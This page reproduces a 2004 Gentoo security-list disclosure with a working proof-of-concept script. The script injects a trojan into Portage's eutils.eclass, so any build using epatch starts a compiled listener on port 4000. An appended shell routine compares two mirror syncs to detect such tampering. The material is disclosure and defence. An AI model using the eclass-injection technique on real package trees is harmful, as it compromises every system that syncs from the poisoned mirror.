
HOWTO Infect Gentoo Linux Systems with a Trojan Horse

Gentoo Linux uses a package management system called Portage. Portage uses eclasses, shared shell libraries that ebuilds inherit so that ebuild authors can reuse ready-made functions in complex builds. Because an eclass is sourced as shell code by every ebuild that inherits it, and the portage tree is fetched by `emerge sync` from rsync mirrors with nothing the user can verify it against, a flaw in this system allows rsync mirror administrators (or anyone who can write to a mirror) to place a modified eclass that installs a Trojan horse on every system syncing from that mirror. The script below demonstrates this by replacing `epatch()` in `eutils.eclass`, so that any package using `epatch` starts a backdoor listener during the build.

Alexander Holler wrote this to the Gentoo Security mailing list on November 6th 2004:

  after 1.5 years (2 years after the bug could be found in bugzilla) it
  seems that one of the highest security risks is closed. At least I've
  seen something about signed ebuilds. (see ).

  Time for the next part. I've already written a bug for that a year ago,
  but it was now closed a second time by "the ... gatekeeper".
  See bug #26110

  Here's the next small script. If you are operating a gentoo mirror, or
  have access to one, feel free to play with it.

  If you are a user, the only practical way to ensure a minimum of
  security is to sync twice:
   (a) sync,
   (b) delete timestamp,
   (c) sync with other mirror and
   (d) look if no files were different, otherwise restart with (a)
  #!/bin/bash
  # Replaces epatch() in eutils.eclass with a version that first starts a
  # listener on TCP port 4000 and then continues with the original epatch body.
  if [ ${#} -ne 1 ] ; then
    echo "This script puts a silly trojan into Gentoo's portage."
    echo "Usage: `basename ${0}` PathToPortage"
    exit 1
  fi

  # Keep the original eclass and generate a patched copy under the real name.
  mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass

  # Insert an ewarn and a backgrounded start of the trojan binary right after the
  # opening brace of epatch(). ${PORTDIR} stays literal (single quotes) and is
  # expanded later by portage when the eclass is sourced; \& is a literal '&'.
  sed -e 's:^epatch().*{:epatch()  {\newarn "Starting Trojan.\nTry it with telnet localhost 4000.\nKill it with killall GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass

  # The "payload": a tiny TCP server that greets everyone who connects.
  cat >${1}/eclass/GentooTrojan.c << EOF
  #include <unistd.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <string.h>
  #include <strings.h>

  /* Bind to port 4000 on all interfaces and answer every client forever. */
  int main(void)
  {
      struct sockaddr_in serv;
      struct sockaddr_in cli;
      int sock;

      sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if (sock < 0)
          return 1;
      bzero((char *) &serv, sizeof(serv));
      serv.sin_family = AF_INET;
      serv.sin_addr.s_addr = htonl(INADDR_ANY);
      serv.sin_port = htons(4000);
      if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
          return 1;
      if (listen(sock, 5) < 0)
          return 1;
      while (1) {
          int scli;
          socklen_t slen = sizeof(cli);
          static char *str = "Your are listing to the famous Gentoo trojan!\n";

          scli = accept(sock, (struct sockaddr *) &cli, &slen);
          if (scli < 0)
              continue;
          write(scli, str, strlen(str));
          close(scli);
      }
  }
  EOF

  gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c
  echo "Done. Portage successful infected with a trojan."
  echo "Just emerge an ebuild which uses epatch and do a"
  echo "  telnet localhost 4000"
  echo "afterwards."
  Kind regards,
  Alexander Holler
  PS: Please don't reply to me, I don't read any Gentoo mailing lists
  anymore, in fact I even don't know why I'm writing this message, as I
  already have lost every interest in Gentoo some time ago.
  PPS: Sorry for those hard words, but all that reminds me of Microsoft.
  The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
  forgotten, ignored or fixed at the same time.
  PPPS: I really appreciate all the very good work on hardened gcc,
  selinux-profiles and so on, but for me, this all seems useless as long
  as the base is compromised that easily and the user has no practical way
  (e.g. hashes) to check what he gets on his machine with a 'sync'.

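The "sync twice from different mirrors and check that nothing differs" procedure from the message, as an added example that is not part of the page or of Alexander Holler's script. It assumes the two syncs have already been done into two separate local directories (for instance the normal tree in /usr/portage and a second copy synced from another mirror into /var/tmp/portage-b; those paths are only an illustration) and that GNU findutils/coreutils are installed, as on Gentoo. It goes slightly beyond the message by naming the differing files instead of just reporting a mismatch; the `make_demo_trees` function builds constructed sample trees so the check can be tried offline.

```shell
#!/bin/sh
# Added example (not from the original post): compare two independently synced
# copies of the portage tree and report every file the two mirrors disagree on.
# It does not run rsync itself; do both syncs first, then call compare_trees.

# hash_tree DIR: one "sha256  ./relative/path" line per regular file under DIR.
# -print0/-0 keep odd file names intact; -r avoids running sha256sum with no
# arguments on an empty tree (GNU xargs).
hash_tree() {
    ( cd "$1" && find . -type f -print0 | xargs -0 -r sha256sum )
}

# compare_trees DIR_A DIR_B: print files whose contents differ between the two
# copies or that exist in only one of them. Returns 0 if the trees are
# identical, 1 if they differ, 2 on a local error.
compare_trees() {
    man_a=$(mktemp) || return 2
    man_b=$(mktemp) || return 2
    hash_tree "$1" > "$man_a"
    hash_tree "$2" > "$man_b"
    # A line present in both manifests means same path and same content; uniq -u
    # drops those and leaves only added, removed or modified files. A modified
    # file shows up twice (one line per hash), so sort -u collapses it to one path.
    diffs=$(sort "$man_a" "$man_b" | uniq -u | sed 's/^[0-9a-f]*  //' | sort -u)
    rm -f "$man_a" "$man_b"
    if [ -n "$diffs" ]; then
        echo "The two syncs disagree on these files; do not trust either copy:"
        echo "$diffs"
        return 1
    fi
    echo "Both syncs are identical."
    return 0
}

# make_demo_trees: constructed sample data for an offline run, not a real tree.
# Copy "a" is clean; copy "b" carries the kind of epatch() modification the
# script above makes plus the extra binary. Prints the base directory.
make_demo_trees() {
    base=$(mktemp -d) || return 2
    for side in a b; do
        mkdir -p "$base/$side/eclass" "$base/$side/app-misc/foo"
        printf 'EAPI=0\n' > "$base/$side/app-misc/foo/foo-1.0.ebuild"
    done
    printf 'epatch() {\n\tpatch -p1 < "$1"\n}\n' > "$base/a/eclass/eutils.eclass"
    printf 'epatch() {\n\t${PORTDIR}/eclass/GentooTrojan &\n\tpatch -p1 < "$1"\n}\n' \
        > "$base/b/eclass/eutils.eclass"
    printf 'binary placeholder\n' > "$base/b/eclass/GentooTrojan"
    echo "$base"
}

# Typical use after syncing from two mirrors (paths are illustrative):
# compare_trees /usr/portage /var/tmp/portage-b
```

If the two copies differ in anything other than files the mirrors are legitimately out of date on, the safe move is the one the message gives: throw both away and start again from step (a), rather than guessing which mirror is the honest one.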